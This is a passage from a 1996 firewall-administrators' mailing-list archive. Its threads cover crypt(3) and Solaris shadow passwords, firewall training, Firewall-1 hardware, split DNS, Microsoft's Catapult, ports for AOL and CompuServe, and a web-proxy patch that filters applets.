1996 08:20:12 -0700 (PDT) Received: by kremvax.demos.su (8.6.13/D) from root@localhost Received: from db.mmtel.msk.su by scan.mmtel.msk.su id aa20114; Message-Id: Date: Tue, 02 Jul 1996 18:56:17 MSK From: anton@db.mmtel.msk.su To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Tue Jul 2 08:48:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA24879 for firewalls-outgoing; Tue, 2 Jul 1996 08:31:13 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA24870 for ; Tue, 2 Jul 1996 08:31:03 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607021528.AA12740@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: Enrique Vadillo Cc: firewalls From: Ryan.Russell/SYBASE Date: 2 Jul 96 8:29:13 EDT Subject: Re: /etc/shadow encryption X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If memory serves... try 'man 3 crypt' Without the quotes, of course. Ryan ---------- Previous Message ---------- To: firewalls cc: From: vadillo @ apu.rcp.net.pe (Enrique Vadillo) @ smtp Date: 07/01/96 09:25:45 PM Subject: /etc/shadow encryption Hello all! I would like to know if you know where i can get the encryption algorythm that Sun Solaris 2.5 uses to write its /etc/shadow file. I am trying to write some proggy that can let me create users thru email, i have so many by day!! i want to make this an automated process, and all i need now is to know the way this encryption is made. Thanks in advance, -- Enrique Vadillo Research & Development at RCP http://www.rcp.net.pe fax : +51 1 241-1320 Peruvian Internet Gateway work: +51 1 954-4799 From firewalls-owner Tue Jul 2 09:09:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA26458 for firewalls-outgoing; Tue, 2 Jul 1996 08:43:37 -0700 (PDT) Received: from Hydro.CAM.ORG (Hydro.CAM.ORG [198.168.100.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA26433 for ; Tue, 2 Jul 1996 08:43:27 -0700 (PDT) Received: from Ocean.CAM.ORG (cyberia@Ocean.CAM.ORG [198.168.100.5]) by Hydro.CAM.ORG (8.7.5/8.7.3) with ESMTP id LAA07045 for ; Tue, 2 Jul 1996 11:40:45 -0400 (EDT) Received: from localhost (cyberia@localhost) by Ocean.CAM.ORG (8.7.5/8.7.3) with SMTP id LAA06369 for ; Tue, 2 Jul 1996 11:40:42 -0400 (EDT) X-Authentication-Warning: Ocean.CAM.ORG: cyberia owned process doing -bs Date: Tue, 2 Jul 1996 11:40:41 -0400 (EDT) From: CyberEyes cc: firewalls@GreatCircle.COM Subject: Re: Training??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 2 Jul 1996, David Tate wrote: > I am looking for IS Security/Firewalling/Network Protection training in MA, > in the month of July. Would anyone be able to recommend such training? If anyone knows of the same kind of things in Quebec/Ontario, I'd appreciate knowing about it... Thanks. Ryan A. Rowe - Montreal, Quebec aka CyberEyes, Rubik'S Cube Tel. -> +1-514-626-0328 | __o o E-Mail -> cyberia@cam.org | _ \<_ <\ WWW -> http://www.cam.org/~cyberia | __/\o_ (_)/(_) /> IRC -> #CAli4NiA, #Triathlon, #Surfing | FTP -> ftp.cam.org /users/cyberia | swim bike run /Seeking Internet-related job./ Read my RESUME on my home page! "I may not know everything, but I'm willing to learn." Will relocate _ANYWHERE_ in North America. "Everyone has their day, mine is July 15th, 1998." From firewalls-owner Tue Jul 2 09:24:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA23869 for firewalls-outgoing; Tue, 2 Jul 1996 08:23:33 -0700 (PDT) Received: from pathfinder.com (relay.pathfinder.com [204.71.242.18]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA23759 for ; Tue, 2 Jul 1996 08:23:00 -0700 (PDT) Received: from harpoon.excalibur-group.com by pathfinder.com (8.6.12/SMI-SVR4) Message-Id: <2.2.32.19960702151929.00702b48@mail.pathfinder.com> X-Sender: josh@mail.pathfinder.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jul 1996 11:19:29 -0400 To: CyberEyes , Sameer From: Josh Hartmann Subject: Re: /etc/shadow encryption DIE DIE DIE Cc: firewalls@GreatCircle.COM, vadillo@apu.rcp.net.pe Sender: firewalls-owner@GreatCircle.COM Precedence: bulk can we put a knife through the heart of this thread *right now*? not only is it way off-topic to begin with (comp.unix.security *maybe*), but it is something a firewall administrator worth her/his salt would never have any part of! so let it die! -josh At 10:18 AM 7/2/96 -0400, CyberEyes wrote: >On Tue, 2 Jul 1996, Sameer wrote: > >> Why do u need the passwd algo for that? Solaris allows >> u to create a user w/o passwd and then let the user create passwd while logging. > > Would you know if there is a way to do what you just described >above, but I don't have access to root? Obviously the user would not have >any privs, but is it possible? > > Ryan A. Rowe - Montreal, Quebec >aka CyberEyes, Rubik'S Cube > >Tel. -> +1-514-626-0328 | __o o >E-Mail -> cyberia@cam.org | _ \<_ <\ >WWW -> http://www.cam.org/~cyberia | __/\o_ (_)/(_) /> >IRC -> #CAli4NiA, #Triathlon, #Surfing | >FTP -> ftp.cam.org /users/cyberia | swim bike run > > /Seeking Internet-related job./ Read my RESUME on my home page! > "I may not know everything, but I'm willing to learn." > Will relocate _ANYWHERE_ in North America. > > "Everyone has their day, mine is July 15th, 1998." > > > =================================================================== Josh Hartmann josh@pathfinder.com The Excalibur Group 100 First Stamford Place (203) 406-2908 Stamford, CT 06902 fax (203) 406-2921 A joint venture between Time Inc. New Media and Time Warner Cable =================================================================== From firewalls-owner Tue Jul 2 09:34:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA28322 for firewalls-outgoing; Tue, 2 Jul 1996 08:57:24 -0700 (PDT) Received: from mailserver.zia.ms.it (icaro.zia.ms.it [194.21.103.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA28303 for ; Tue, 2 Jul 1996 08:57:14 -0700 (PDT) Organization: Rete Telematica Apuana _ Consorzio Zona Industriale Apuana - Massa - Italy Received: from netix.it (caronte.netix.it [194.21.103.247]) by mailserver.zia.ms.it (8.6.12/8.6.12) with SMTP id RAA05528; Tue, 2 Jul 1996 17:53:02 +0200 Received: from netix by netix.it (5.x/SMI-SVR4) Received: by netix (5.0/SMI-SVR4) Date: Tue, 2 Jul 1996 17:43:50 --100 From: ap@netix.it (Aldo Pannocchia) Message-Id: <9607021543.AA00907@netix> To: baysalc@boun.edu.tr Subject: Re: Hardware requirements of Firewall-1 Cc: firewalls@GreatCircle.COM X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From firewalls-owner@GreatCircle.COM Sun Jun 30 17:47 MET 1996 > Date: Sun, 30 Jun 1996 15:08:07 +0400 (MEDT) > From: Can BAYSAL > X-Sender: baysalc@hamlin.cc.boun.edu.tr > To: firewall list > Subject: Hardware requirements of Firewall-1 > Mime-Version: 1.0 > > Hi there; > I wonder what is the REAL minimum required configuration of > Firewall-1. The book says that Sun SPARC based system, I do not think > this means IPX :) , does it? For example on a 10 Mbits ethernet would a > Sparc 5 be acceptable? > > Thanks; > Can Baysal My company use FW-1 with a SS2 16 Mbytes RAM as gateway without any problems bye Aldo ----------------------------------------------------------------- Le opinioni espresse sono quelle dello scrivente e non quelle della NetiX s.r.l. o di compagnie ad essa associate. The opinions expressed are those of the writer and not of NetiX s.r.l. nor of any NetiX-associated companies. Aldo Pannocchia phone: +39 (585) 790133 fax: +39 (585) 792552 NetiX S.r.l. Viale Stazione, 78 e-mail: apannocchia@netix.it 54100 Massa MS - Italy url: http://www.zia.ms.it/netix ----------------------------------------------------------------- From firewalls-owner Tue Jul 2 09:49:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA02678 for firewalls-outgoing; Tue, 2 Jul 1996 09:24:27 -0700 (PDT) Received: from neon.ingenia.com (neon.ingenia.com [205.207.219.29]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA02653 for ; Tue, 2 Jul 1996 09:24:15 -0700 (PDT) Received: (from shaver@localhost) by neon.ingenia.com (8.8.Alpha.2/8.6.9) id MAA06344; Tue, 2 Jul 1996 12:21:09 -0400 From: Mike Shaver Message-Id: <199607021621.MAA06344@neon.ingenia.com> Subject: Re: Stateful Packet Screens To: avalon@coombs.anu.edu.au (Darren Reed) Date: Tue, 2 Jul 1996 12:21:08 -0400 (EDT) Cc: shaver@neon.ingenia.ca, Ryan.Russell@sybase.com, firewalls@GreatCircle.COM In-Reply-To: <199607020857.BAA28063@miles.greatcircle.com> from "Darren Reed" at Jul 2, 96 06:54:52 pm X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thus spake Darren Reed: > Dealing with a 1MB e-mail is going to be difficult, in kernel space. 1) Who says it has to be in kernel space? 2) Who says there has to be a kernel space at all? We're not limited to Unix here. > FW-1 is a bit more advanced: it snoops RPC traffic and learns about > RPC services that way rather than any configuration file. Wow, that almost sounds like it's processing stuff at the application level! =) Mike -- #> Mike Shaver (shaver@ingenia.com) Ingenia Communications Corporation <# #> Paranoid for money. Sarcastic for kicks. <# #> <# #> "They already *KNOW* I am a whacko, Karen. <# #> That doesn't mean I am *WRONG*." -- mjr@clark.net <# From firewalls-owner Tue Jul 2 10:18:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04153 for firewalls-outgoing; Tue, 2 Jul 1996 09:33:43 -0700 (PDT) Received: from sam.networx.ie (dublin-ts15-94.indigo.ie [194.125.134.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA04111 for ; Tue, 2 Jul 1996 09:33:29 -0700 (PDT) Received: from mip1.networx.ie (mip1.networx.ie [194.9.12.1]) by sam.networx.ie (8.6.12/8.6.12) with SMTP id QAA05181; Tue, 2 Jul 1996 16:04:29 GMT X-Organisation: I.T. NetworX Ltd X-Business: Network Consultancy and Training X-Address: 67 Merrion Square, Dublin 2, Ireland X-Voice: +353-1-676-8866 X-Fax: +353-1-676-8868 Received: from mike.networx.ie by mip1.networx.ie Date: Tue, 2 Jul 1996 16:02:52 BST From: Michael Ryan Reply-To: mike@networx.ie Subject: Re: /etc/shadow encryption To: Arnaud Girsch Cc: Enrique Vadillo , firewalls@GreatCircle.COM Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Forgive me if I'm wrong, but I believe the crypt() function is not exported outside the U.S. and I note the requestor is outside the U.S., so his Un*x probably doesn't have it. On Mon, 1 Jul 1996 21:03:40 -0700 (PDT) Arnaud Girsch wrote: > > I would like to know if you know where i can get the encryption algorythm > > that Sun Solaris 2.5 uses to write its /etc/shadow file. > > > > I am trying to write some proggy that can let me create users thru email, > > i have so many by day!! i want to make this an automated process, > > and all i need now is to know the way this encryption is made. > > If that's really what you want to do, you don't need the algorythm, but > just have a look at crypt(3) on all (?) Un*x systems. Mike --- From firewalls-owner Tue Jul 2 10:19:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA07252 for firewalls-outgoing; Tue, 2 Jul 1996 09:58:59 -0700 (PDT) Received: from imsc.ernet.in ([202.41.95.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA07000 for ; Tue, 2 Jul 1996 09:57:32 -0700 (PDT) Received: from brahma.iitm.ernet.in by imsc.ernet.in (5.x/SMI-SVR4) Received: by brahma.iitm.ernet.in; (5.65/1.1.8.2/07Feb96-0917AM) Date: Tue, 2 Jul 1996 22:16:16 +0530 (IST) From: Natchu Vishnu Priya To: Lack Mr G M Cc: Dan Shadix Subject: Re: split-brain DNS In-Reply-To: <9607011204.ZM4779@ukwit01> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 1 Jul 1996, Lack Mr G M wrote: > > Why can't you make the one master DNS server secondary for all your internal > sub-domains? Then if a request is for a domain for which it is authoritative, > it will just respond, if not then it will go to the Internet at large. > > Whereas this might work (ie. it sounds as though it will, but I haven't > thought it through completely) this would leave me with the master server being This will work... > authoratative for everything. This would push the size of its database up from > ca. 8000 to ca. 40000 entries (guessing here, but of that order). I don't have > the memory on the servers for such numbers. > Thats bad. The point here is that since you are using a single machine to answer all of the firewalls queries it is likely to have a very very large cache. Any connection from the firewall to an internal machine will make a query to this machine. If the TTL values are around a day (this is what they would be if you do not have a rather static DNS) then a large portion of the internal records are likely to be cached most of the time. Also this machine will also cache all the outgoing queries. So you need memory for such numbers anyway... > Also, it strikes me as being against the "spirit" of DNS. Relatively few > queries go "between" domains, so I don't want this master server to spend a lot > of its time doing zone queries for timestamps and frequent zone transfers just > for these. I just want to send the query off to the relevant server, just as > in the "full" InterNET. > > A logical extension of your solution would be to get all of the root name > servers to become secondaries for all domains, and I'm sure that we can agree > that would be a disaster! That would be a disaster... but no other solution seems to present itself.... unless you are willing to patch bind to do this. _______________________________________________________ Vishnu Priya Natchu System Administrator 225, Saraswathi, Network Systems Lab, IIT Madras 600 036 Computer Science & Engg. INDIA IIT Madras 0091-044-235-1889 0091-044-235-1921 _______________________________________________________ Email: mailto:vishnu@brahma.iitm.ernet.in WWW page: http://brahma.iitm.ernet.in/~vishnu _______________________________________________________ From firewalls-owner Tue Jul 2 10:35:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA11746 for firewalls-outgoing; Tue, 2 Jul 1996 10:31:28 -0700 (PDT) Received: from dfw-ix6.ix.netcom.com (dfw-ix6.ix.netcom.com [206.214.98.6]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA11739 for ; Tue, 2 Jul 1996 10:31:20 -0700 (PDT) Received: from larry-s-pc (nyc-ny23-18.ix.netcom.com [206.214.136.82]) by dfw-ix6.ix.netcom.com (8.6.13/8.6.12) with SMTP id KAA23155 for ; Tue, 2 Jul 1996 10:28:38 -0700 Message-Id: <1.5.4.32.19960702172838.0066c644@popd.ix.netcom.com> X-Sender: ler@popd.ix.netcom.com X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jul 1996 13:28:38 -0400 To: firewalls@greatcircle.com From: Larry Rudnick Subject: Training duplicate Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My apologies to the list for the duplicate posting. Larry Rudnick <<< ++++++++++ Larry Rudnick +++++++++++ >>> <<< ++++++ OppenheimerFunds, Inc. ++++++ >>> <<< ++++++++ ler@ix.netcom.com +++++++++ >>> From firewalls-owner Tue Jul 2 11:04:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA14994 for firewalls-outgoing; Tue, 2 Jul 1996 10:58:09 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA14974 for ; Tue, 2 Jul 1996 10:57:59 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA16415 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Tue, 2 Jul 96 10:50:18 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607021750.AA00467@manzanita.DEV.3Com.COM.noname> To: cyberia@CAM.ORG Subject: Re: Training??? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'd recommend Learning Tree (1-800-THE-TREE). They have courses all over the place. I have no affilliation with them, but I've taken two of their courses (Windows NT Client/Server, and Internet Security) and been happy with both of them. BobK From firewalls-owner Tue Jul 2 12:24:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA21111 for firewalls-outgoing; Tue, 2 Jul 1996 12:07:47 -0700 (PDT) Received: from absolut-zero.winternet.com (absolut-zero.winternet.com [198.174.169.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA21093 for ; Tue, 2 Jul 1996 12:07:38 -0700 (PDT) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by absolut-zero.winternet.com (8.7.5/8.7.5) with ESMTP id OAA25400; Tue, 2 Jul 1996 14:04:30 -0500 (CDT) Received: (from dufresne@localhost) by parka (8.7.4/8.6.12) id OAA04622; Tue, 2 Jul 1996 14:04:29 -0500 (CDT) Posted-Date: Tue, 2 Jul 1996 14:04:29 -0500 (CDT) Date: Tue, 2 Jul 1996 14:04:29 -0500 (CDT) From: Ron DuFresne To: John Betts cc: David LeBlanc , firewalls@GreatCircle.COM Subject: Re: NT Backoffice "Catapult" firewall certified? In-Reply-To: <199607011443.QAA30859@rbit.co.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 1 Jul 1996, John Betts wrote: > % This isn't true. Guest doesn't have permissions to write the registry. > % Besides which, the first thing you do when setting up an NT machine is to > % disable guest. Somewhat like taking the + out of the rhosts file on a Sun. > % > > In my haste to clear my mailbox, I didnt give 100% truths. > > I didnt mean to imply that Guest could do _anything_ to the registry, > just some things (remotely). > > Not every person who puts NT boxes (or any other unix box for that matter) > on the Internet knows about things like disabling guest account, > setting permissions on shares correctly, etc. > > I am fairly sure that _MY_ nt box is fairly secure, but that's only > because I spent time going through anything that I could think of > to secure it. > > My main point against NT firewalls is the following: > _as a general rule_ people who want NT firewalls, want them > because any tom, dick and harry can get them going, without > extensive knowledge of security and tcp/ip. > > I have no problem with firewalls that are so easy to administer,etc, > BUT, generally, the people who setup these easy-to-use firewalls, > dont know/think about things like disabling guest account > (I know, lame example), or setting permissions on shares (or disabling > all shares, or whatever), etc, and if the firewall software dosnt > do this for them, then their firewall host can be easilly compromised.... > > It takes time and knowledge (well, more like common sense) to make an NT box > secure(ish). We all know that a large majority of ppl who insist on NT > because of its ease of use, and requirement for little-to no knowledge > of system administration and security, dont have the time and knowledge > to secure their box. > > John, I think Russ was also trying to point out that the same applies to unix based systems as well. They aren't secure out of the box, it takes special expertise to secure them, and thus, there's nothing here that makes them really, any different than a unix based system. The main point here being, don't let your OS religion color your judgement. Later, Ron Dufresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Tue Jul 2 12:51:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA23197 for firewalls-outgoing; Tue, 2 Jul 1996 12:47:07 -0700 (PDT) Received: from hp01.vak12ed.edu (hp01.vak12ed.edu [141.104.150.251]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA23178 for ; Tue, 2 Jul 1996 12:47:01 -0700 (PDT) Message-Id: <199607021947.MAA23178@miles.greatcircle.com> Received: by hp01.vak12ed.edu From: "W.C. Epperson" Subject: Re: Catapault firewall To: firewalls@greatcircle.com Date: Tue, 02 Jul 1996 15:44:18 EDT In-Reply-To: <199607020139.VAA27764@explorer2.clark.net>; from "Marcus J. Ranum" at Jul 1, 96 9:39 pm X-Mailer: Elm [revision: 109.18] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus appears to have writ: [snip] > The brief on Microsoft's page is completely content-free. > Several times, Catapult is recommended as the solution because > it's secure. Nothing about why it's secure or how it's secure. > Don't bother your head with that stuff! It's SECURE, OK? > > ...Or at least as secure as a beta product that only > runs on a beta version of NT can be. > > In fairness to Microsoft, it may be pretty good stuff. > But we can't tell from what they say. Which is why I feel it > marks a milestone in the firewall market. The Big Boys Are Here > now and it's SECURE, it's OK. That argument worked for Netscape, > for a while. > > Those of us who've been with this firewall thing for > a while have seen the market get muddied before, and eventually > things calm down again. It'll be fascinating to see what > happens if Microsoft decides to put even a teeny bit of their > marketing muscle behind Catapult. I guess it means that, as > a technology, firewalls have "arrived." "To question all things; never to turn away from any difficulty; to accept no doctrine either from ourselves or from other people without a rigid scrutiny by negative criticism; letting no fallacy, or incoherence or confusion of thought, step by unperceived; ...these are the lessions we learn from the ancient dialecticians." First time I saw that, I though Marcus had written it, but it's from John Stuart Mill. While I don't agree that the Microsoft fluff represents a new trend (a certain _major_ router manufacturer has for some time touted their firewalling stuff with slides like "Unix: Wrong Choice for Firewalls" with no credible evidence that their product is better, only less well understood by the black hats), they may be the first fluffers on this scale in the firewalls market with the clout and credibility to pull it off. Hmm, now that I look at it again, I guess Marcus' point is that the weighing in of a gorilla like Microsoft is a signal event of firewalls' arrival as a technology. I shudder to agree. -- W.C. Epperson "I have great faith in fools. Senior SE Self-confidence, my friends call it." Information Security Officer --Edgar Allan Poe-- DBA Emeritus Curmudgeon-for-Life Virginia Dept. of Education epperson@pen.k12.va.us From firewalls-owner Tue Jul 2 13:04:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA24176 for firewalls-outgoing; Tue, 2 Jul 1996 12:58:29 -0700 (PDT) Received: from relay1.smtp.psi.net (relay1.smtp.psi.net [38.8.14.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA24127 for ; Tue, 2 Jul 1996 12:58:17 -0700 (PDT) Received: from adpmail.es.adp.com by relay1.smtp.psi.net (8.6.12/SMI-5.4-PSI) Received: from ccMail by adpmail.es.adp.com Mime-Version: 1.0 Date: Mon, 1 Jul 1996 16:02:06 -0500 Message-ID: <1d98ca00@es.adp.com> From: jorge_triana@es.adp.com (Jorge Triana) Subject: Re: AOL and Compuserve through f/wall To: Firewalls@GreatCircle.COM Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can somebody please tell me how to configure the firewall to get access to AOL and Compuserve...I have seen some msgs going back and forth here...but if anybody has specifics, I would appreciate it... Let me know what I would have to configure as far as the firewall and the perimeter router...Thanks.. Jorge Triana jorge_triana@es.adp.com From firewalls-owner Tue Jul 2 13:35:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA26372 for firewalls-outgoing; Tue, 2 Jul 1996 13:19:05 -0700 (PDT) Received: from neon.ingenia.com (neon.ingenia.com [205.207.219.29]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id NAA26330 for ; Tue, 2 Jul 1996 13:18:51 -0700 (PDT) Received: (from shaver@localhost) by neon.ingenia.com (8.8.Alpha.2/8.6.9) id QAA07528; Tue, 2 Jul 1996 16:15:58 -0400 From: Mike Shaver Message-Id: <199607022015.QAA07528@neon.ingenia.com> Subject: Re: Catapault firewall To: epperson@vak12ed.edu (W.C. Epperson) Date: Tue, 2 Jul 1996 16:15:57 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199607021947.MAA23178@miles.greatcircle.com> from "W.C. Epperson" at Jul 2, 96 03:44:18 pm X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thus spake W.C. Epperson: > "To question all things; never to turn away from any difficulty; to > accept no doctrine either from ourselves or from other people without > a rigid scrutiny by negative criticism; letting no fallacy, or incoherence > or confusion of thought, step by unperceived; ...these are the lessions > we learn from the ancient dialecticians." First time I saw that, I > though Marcus had written it, but it's from John Stuart Mill. Marcus doesn't use semicolons. =) > Hmm, now that I look at it again, I guess Marcus' point is that > the weighing in of a gorilla like Microsoft is a signal event of > firewalls' arrival as a technology. I shudder to agree. And the fact that a company (even The Company) can reasonably hope to sell the product based on no factual description of its merits whatsoever. Mike (`and I'd like it written in Java') -- #> Mike Shaver (shaver@ingenia.com) Ingenia Communications Corporation <# #> Chief System Architect -- Head geek -- System exorcist <# #> <# #> "Have you considered a life? I hear they're quite affordable <# #> these days." --- shields@tembel.org <# From firewalls-owner Tue Jul 2 14:19:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA01199 for firewalls-outgoing; Tue, 2 Jul 1996 14:13:33 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA01112 for ; Tue, 2 Jul 1996 14:12:24 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA21721 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Tue, 2 Jul 96 13:58:42 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607022058.AA00541@manzanita.DEV.3Com.COM.noname> To: Firewalls@GreatCircle.COM, jorge_triana@es.adp.com Subject: Re: AOL and Compuserve through f/wall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk AOL is port 5190 (server) and is found on the following IP subnets: 198.81.8.0 198.81.18.0 198.81.22.0 Compuserve is port 4144. BobK From firewalls-owner Tue Jul 2 17:22:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08587 for firewalls-outgoing; Tue, 2 Jul 1996 17:07:10 -0700 (PDT) Received: from kent.ansto.gov.au (kent.ansto.gov.au [137.157.45.204]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA08559 for ; Tue, 2 Jul 1996 17:06:37 -0700 (PDT) Received: by kent.ansto.gov.au (8.7.5/1.51+ANSAMS) From: frank@ansto.gov.au (Frank Crawford) To: mike@networx.ie Cc: firewalls@GreatCircle.COM Date: Wed, 3 Jul 1996 09:55 EST Subject: Re: /etc/shadow encryption Content-Type: text/plain Message-ID: <31d9b8730.5ebc@kent.ansto.gov.au> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michael Ryan writes: > Forgive me if I'm wrong, but I believe the crypt() function is not > exported outside the U.S. and I note the requestor is > outside the U.S., so his Un*x probably doesn't have it. In this case you are wrong, but are forgiven. The crypt program and other reversible encryption tools for Unix can't be exported, but the crypt routine (i.e. crypt(3)) is exportable, because it is a one-way "encryption" (i.e. you can't get the original info back). Frank Crawford From firewalls-owner Tue Jul 2 20:04:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA15311 for firewalls-outgoing; Tue, 2 Jul 1996 19:55:45 -0700 (PDT) Received: from SantaClara01.pop.internex.net (SantaClara01.POP.InterNex.Net [205.158.3.18]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA15304 for ; Tue, 2 Jul 1996 19:55:40 -0700 (PDT) From: carl@hdshq.com Received: from claunch.hdshq.com ([206.215.16.130]) Received: from [198.92.130.5] (claunch.hdshq.com [198.92.130.5]) by claunch.hdshq.com (1/HDS MAIL SYSTEM) with SMTP id SAA20024 for ; Tue, 2 Jul 1996 18:56:20 -0700 (PDT) Message-Id: <199607030156.SAA20024@claunch.hdshq.com> X-Sender: carl@lan.hdshq.com Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 2 Jul 1996 18:56:20 -0800 To: firewalls@greatcircle.com Subject: New version of Java, JavaScript, ActiveX screening http-gw patch Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have posted the latest version of my patches to the TIS fwtk http-gw module, that provide site control over Java, JavaScript and/or ActiveX embedded in web pages. The patches exist for both http-gw V1.4 and http-gw V2.0alpha, and can be found at http://www.hdshq.com/fixes/fwtk/ The administrator can define global or per-client-host policies defining removal of these applets from the pages as they are browsed. In addition, this version allows the administrator to define browsers as safe for these applets based on the User-agent: header line automatically generated by browsers with each request. This allows the selective admission of applet types for browser releases the administrator deems "safe" while stripping the applets from web pages for all users of other browser versions/releases. ActiveX, the Microsoft extension of OLE (OCXs), will allow web pages to invoke application programs on the client PC. JavaScript is a web page scripting language which is mostly independent of Java. The code base for these context diffs is provided by Trusted Information Systems firewall toolkit (fwtk), which can be retrieved from ftp.tis.com The fwtk exists in both V1.3 and 2.0alpha version. The component http-gw of the fwtk is modified by these patches to provide the screening functionality. V1.3 http-gw must be upgraded first by the http-gw patches on ftp.tis.com, to reach the V1.4 base level upon which I built my patch. Carl V Claunch Hitachi Data Systems From firewalls-owner Tue Jul 2 21:19:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA20264 for firewalls-outgoing; 